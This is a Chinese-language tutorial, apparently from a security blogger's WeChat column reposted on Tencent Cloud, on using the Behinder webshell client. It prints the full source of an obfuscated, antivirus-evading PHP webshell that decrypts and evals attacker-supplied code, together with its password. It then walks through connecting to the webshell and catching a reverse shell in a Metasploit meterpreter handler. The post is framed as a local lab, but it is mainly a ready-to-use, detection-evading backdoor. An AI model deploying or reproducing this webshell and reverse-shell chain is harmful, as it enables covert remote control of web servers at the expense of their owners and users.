前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >冰蝎利用免杀webshell链接,反弹shell(附免杀webshell)

冰蝎利用免杀webshell链接,反弹shell(附免杀webshell)

作者头像
网e渗透安全部
发布2022-12-01 15:25:43
2.9K0
发布2022-12-01 15:25:43
举报
文章被收录于专栏:白安全组

前言:

冰蝎简单说就是利用动态二进制加密实现新型一句话木马的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的,所以不容易被一些防火墙发现。

环境:

我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。

Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打 开冰蝎目录输入命令

正文:

首先我们拿免杀的webshell

源码:

代码语言:javascript
复制
<?php @error_reporting(0);session_start();$key="97dc284cf580da5e";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$HEm9O=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/s+/','','base 64 _ deco de');$HEm9O=$t($HEm9O."");for($i=0;$i<strlen($HEm9O);$i++) { $new_key = $key[$i+1&15];$HEm9O[$i] = $HEm9O[$i] ^ $new_key;}  }else{ $HEm9O=openssl_decrypt($HEm9O, "AES128", $key);}$arr=explode('|',$HEm9O);$func=$arr[0];$params=$arr[1];class Go6049YI{ public function __invoke($p) {@eval("/*ZZZm5Yg5L4*/".$p."");}}@call_user_func/*ZZZm5Yg5L4*/(new Go6049YI(),$params);?>

直接新建一个php文件复制进去就好了

链接的密码是:tide

我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。

我这里是直接在kali上本地实验,ps:大家可以自行安装一些waf,我懒得安装了。

首先我们启动冰蝎,这里我将它放到了我的工具包中,文章末尾会给大家提供软件。

启动的命令:

代码语言:javascript
复制
java -jar Behinder_v3.0_Beta6_linux.jar 

然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,

然后我们回到图形界面去,

我们选择新增后填入你放入木马的主机地址目录

这里我们可以自定义请求头,然后保存即可,保存完我们双击进去

这里我们看到phpinfo的页面就是链接成功了。

这时候我们就可以进行下一步反弹shell了,(其他功能自行尝试)

我们选择功能栏中得到反弹shell

我们需要设置一下我们监听机的IP和端口

我们到kali中打开msf

启动命令:

代码语言:javascript
复制
msf run

然后选择攻击和payload

代码语言:javascript
复制
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
Show option 查看需要配置的选项

我们这里设置一个IP就好,就是你监听机的IP

代码语言:javascript
复制
set lhost 192.168.0.107

然后run 启动监听就好

我们回到冰蝎图形界面,选择metepreter直接点击给我连就行

可以看到这里直接链接成功。

软件关注公众号:白安全组

发送:冰蝎

即可获得软件

网站:www.wangehacker.cn

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-09-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言:
  • 环境:
  • 正文:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档